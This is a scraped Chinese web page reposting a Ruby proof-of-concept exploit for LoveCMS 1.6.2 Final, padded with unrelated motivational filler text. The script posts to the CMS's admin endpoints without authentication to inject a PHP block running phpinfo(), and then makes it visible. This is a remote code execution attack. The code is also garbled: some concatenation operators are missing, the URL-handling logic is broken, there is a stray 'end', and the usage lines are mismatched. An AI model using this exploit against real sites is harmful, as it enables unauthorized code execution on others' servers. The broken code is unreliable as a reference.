LoveCMS 1.6.2 Final Remote Code Execution Exploit

小时候,认为流血了就是很严重的事,不管疼不疼,先哭了再说。直到长大后才发觉,其实流泪比流血更疼。
#!/usr/bin/ruby
#
## Exploit by PoMdaPiMp!
## ---------------------
## pomdapimp(at)gmail(dotcom)
##
## LoveCMS Exploit Series
## Episode 1: adding a side block
##
## Description: add some php into a block container
## on the side of the site. phpinfo() is called.
##
## Usage: ./LoveCMS_1_blocks.rb <host>
## Ex: ./LoveCMS_2_themes.rb http://site.com/lovecms/
##
## Tested on: lovecms_1.6.2_final (MacOS X, Xampp)
# require 'net/http'
require 'uri' @host = 'http://127.0.0.1/lovecms_1.6.2_final/lovecms/' @host = ARGV[0] if ARGV[0]
@host = @host[-1, 1].to_s != '/' ? '/' : '' if @host
# --
puts " LoveCMS Exploit Series. #1: Adding side blocks."
puts
puts " : Attacking host: " @host # --
# Insert a new block
res = Net::HTTP.post_form(URI.parse(@host 'system/admin/addblock.php'),
{'submit'=>'1', 'title'=>'H4Ck', 'content' => 'phpinfo();', 'type' => 'php'})
puts " :: Block inserted." # --
# Build post variable for next step
post_vars = {'submit' => 1}
(1..50).each do |id|
post_vars['position' id.to_s] = 1
post_vars['height' id.to_s] = 1
post_vars['visible' id.to_s] = 1
end
# Make the block visible
res = Net::HTTP.post_form(URI.parse('http://127.0.0.1/lovecms_1.6.2_final/lovecms/system/admin/blocks.php'), post_vars )
puts " :: Blocks displayed." # --
puts
puts " - Visit " @host
end

到此这篇关于LoveCMS 1.6.2 Final Remote Code Execution Exploit 就介绍到这了。在这个世界上,是有许多事情那都是我们所难以预料的。我们不能去控制际遇,却可以掌握自己;我们无法预知,却可以把握现在;我们不知道自己的到底有多长,但我们却可以安排当下的生活。更多相关LoveCMS 1.6.2 Final Remote Code Execution Exploit 内容请查看相关栏目,小编编辑不易,再次感谢大家的支持!

标签: